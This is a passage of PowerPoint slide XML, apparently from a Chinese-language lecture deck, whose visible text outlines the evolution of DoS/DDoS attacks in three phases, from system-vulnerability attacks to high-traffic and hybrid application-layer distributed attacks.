                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>攻击类型划分</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book" panose="020B0503020102020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="Franklin Gothic Book" panose="020B0503020102020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>I</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400"/>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标题 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7FBD3C26-78E9-499C-95C2-9507A8B1C840}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>DoS/DDoS攻击演变</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="190467" name="内容占位符 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{87EDC03A-0F83-4B44-948C-D171D5D14488}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1371600" y="2322513"/>
            <a:ext cx="7620000" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="190468" name="AutoShape 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{974AC01A-477C-4020-9892-B9ABD5C168DB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5562600" y="2179638"/>
            <a:ext cx="2819400" cy="2895600"/>
          </a:xfrm>
          <a:prstGeom prst="chevron">
            <a:avLst>
              <a:gd name="adj" fmla="val 16468"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="C17529"/>
          </a:solidFill>
          <a:ln w="38100">
            <a:solidFill>
              <a:srgbClr val="FFFFFF"/>
            </a:solidFill>
            <a:miter lim="800000"/>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000">
                <a:solidFill>
                  <a:srgbClr val="0C0C0C"/>
                </a:solidFill>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>大流量</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="0C0C0C"/>
                </a:solidFill>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="0C0C0C"/>
                </a:solidFill>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>应用层</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000">
              <a:solidFill>
                <a:srgbClr val="0C0C0C"/>
              </a:solidFill>
              <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              <a:sym typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="0C0C0C"/>
                </a:solidFill>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>混合型</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000">
              <a:solidFill>
                <a:srgbClr val="0C0C0C"/>
              </a:solidFill>
              <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              <a:sym typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="0C0C0C"/>
                </a:solidFill>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>分布式攻击</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="190469" name="AutoShape 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FCCD3BD2-2011-4C26-8891-3E10478E5EC5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3200400" y="2179638"/>
            <a:ext cx="2971800" cy="2895600"/>
          </a:xfrm>
          <a:prstGeom prst="chevron">
            <a:avLst>
              <a:gd name="adj" fmla="val 17842"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="A19574"/>
          </a:solidFill>
          <a:ln w="38100">
            <a:solidFill>
              <a:srgbClr val="FFFFFF"/>
            </a:solidFill>
            <a:miter lim="800000"/>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000">
                <a:solidFill>
                  <a:srgbClr val="0C0C0C"/>
                </a:solidFill>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>大流量型</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000">
              <a:solidFill>
                <a:srgbClr val="0C0C0C"/>
              </a:solidFill>
              <a:latin typeface="Franklin Gothic Book" panose="020B0503020102020204" pitchFamily="34" charset="0"/>
              <a:sym typeface="Franklin Gothic Book" panose="020B0503020102020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="0C0C0C"/>
                </a:solidFill>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>分布式攻击</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="190470" name="AutoShape 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F87B92EF-1D32-4A20-BE67-6ED5B3F6D854}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="838200" y="2179638"/>
            <a:ext cx="2971800" cy="2895600"/>
          </a:xfrm>
          <a:prstGeom prst="chevron">
            <a:avLst>
              <a:gd name="adj" fmla="val 17842"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
          <a:ln w="38100">
            <a:solidFill>
              <a:srgbClr val="FFFFFF"/>
            </a:solidFill>
            <a:miter lim="800000"/>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000">
                <a:solidFill>
                  <a:srgbClr val="0C0C0C"/>
                </a:solidFill>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>系统漏洞型</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="190471" name="AutoShape 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{62E35B87-9FAB-4AFD-8244-91D52C5A213E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1066800" y="1557338"/>
            <a:ext cx="2057400" cy="574675"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 50000"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
          <a:ln w="38100">
            <a:solidFill>
              <a:srgbClr val="FFFFFF"/>
            </a:solidFill>
            <a:round/>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2400">
                <a:solidFill>
                  <a:srgbClr val="0C0C0C"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book" panose="020B0503020102020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="Franklin Gothic Book" panose="020B0503020102020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Phase 1</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="190472" name="AutoShape 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{77CD6E9D-5E50-4172-9CEA-CF8B38819233}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3386138" y="1557338"/>
            <a:ext cx="2057400" cy="574675"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 50000"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="A19574"/>
          </a:solidFill>
          <a:ln w="38100">
            <a:solidFill>
              <a:srgbClr val="FFFFFF"/>
            </a:solidFill>
            <a:round/>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2400">
                <a:solidFill>
                  <a:srgbClr val="0C0C0C"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book" panose="020B0503020102020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="Franklin Gothic Book" panose="020B0503020102020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Phase 2</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="190473" name="AutoShape 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{547A04F2-9C2A-4A4F-89F9-D1BBCF5EC98E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5715000" y="1557338"/>
            <a:ext cx="2057400" cy="574675"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 50000"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="C17529"/>
          </a:solidFill>
          <a:ln w="38100">
            <a:solidFill>
              <a:srgbClr val="FFFFFF"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>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2400">
                <a:solidFill>
                  <a:srgbClr val="0C0C0C"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book" panose="020B0503020102020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="Franklin Gothic Book" panose="020B0503020102020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Phase 3</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="190474" name="AutoShape 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{72E0E1C7-CC5B-48ED-834D-9C671EF7F6F7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1792288" y="5341938"/>
            <a:ext cx="5462587" cy="608012"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 10889"/>
            </a:avLst>
          </a:prstGeom>
          <a:gradFill rotWithShape="1">
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="D89568"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="F7E9D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solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:sym typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="190475" name="AutoShape 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B4F02CC1-10E3-4FBA-927B-F3261A00FEA1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1792288" y="6218238"/>
            <a:ext cx="5465762" cy="608012"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 10889"/>
            </a:avLst>
          </a:prstGeom>
          <a:gradFill rotWithShape="1">
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="AFD868"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="EEF7D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solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:sym typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="190476" name="AutoShape 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D0BD85B0-282E-435F-8C28-006126D72DF3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5400000">
            <a:off x="1785938" y="6272213"/>
            <a:ext cx="393700" cy="336550"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 41485"/>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solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:sym typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="190477" name="AutoShape 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0CA7E61B-9994-4BA7-9D63-8D99E02DE16D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5400000">
            <a:off x="1785938" y="5421313"/>
            <a:ext cx="393700" cy="336550"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 41485"/>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zh-CN" sz="2400">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:sym typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="190478" name="Text Box 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0A1F8B03-A5A6-4AB9-858B-261A2831FBFE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2316163" y="5397500"/>
            <a:ext cx="450850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ClrTx/>
              <a:buSzPct val="50000"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>以小搏大</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>以大压小</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="190479" name="Text Box 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FCAE01C0-2839-4F25-80B1-06C64BCD15EB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2287588" y="6221413"/>
            <a:ext cx="507047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ClrTx/>
              <a:buSzPct val="50000"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>技术型</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>带宽和流量的斗争</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="190480" name="右箭头 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7A3B3E4E-D63B-4568-9FAA-3FDA2D50EA82}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3714750" y="5484813"/>
            <a:ext cx="1071563" cy="285750"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 49983"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
          <a:ln w="25400">
            <a:solidFill>
              <a:srgbClr val="AF7621"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr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zh-CN" sz="2400">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              <a:sym typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="190481" name="右箭头 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EDA8F183-941A-415B-9F59-A78AF74C541A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3714750" y="6342063"/>
            <a:ext cx="1071563" cy="285750"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 49983"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
          <a:ln w="25400">
            <a:solidFill>
              <a:srgbClr val="AF7621"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr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endParaRPr lang="zh-CN" altLang="zh-CN" sz="2400">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              <a:sym typeface="华文楷体" panose="02010600040101010101" pitchFamily="2"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AutoShape 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3446D907-D111-487C-A3BF-EDDCAE70B7EC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="-6534221">
            <a:off x="439737" y="5289551"/>
            <a:ext cx="962025" cy="908050"/>
          </a:xfrm>
          <a:prstGeom prst="cloudCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -44597"/>
              <a:gd name="adj2" fmla="val 45079"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>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400">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:sym typeface="Franklin Gothic Book" panose="020B0503020102020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="191491" name="Text Box 3">
            <a:extLst>
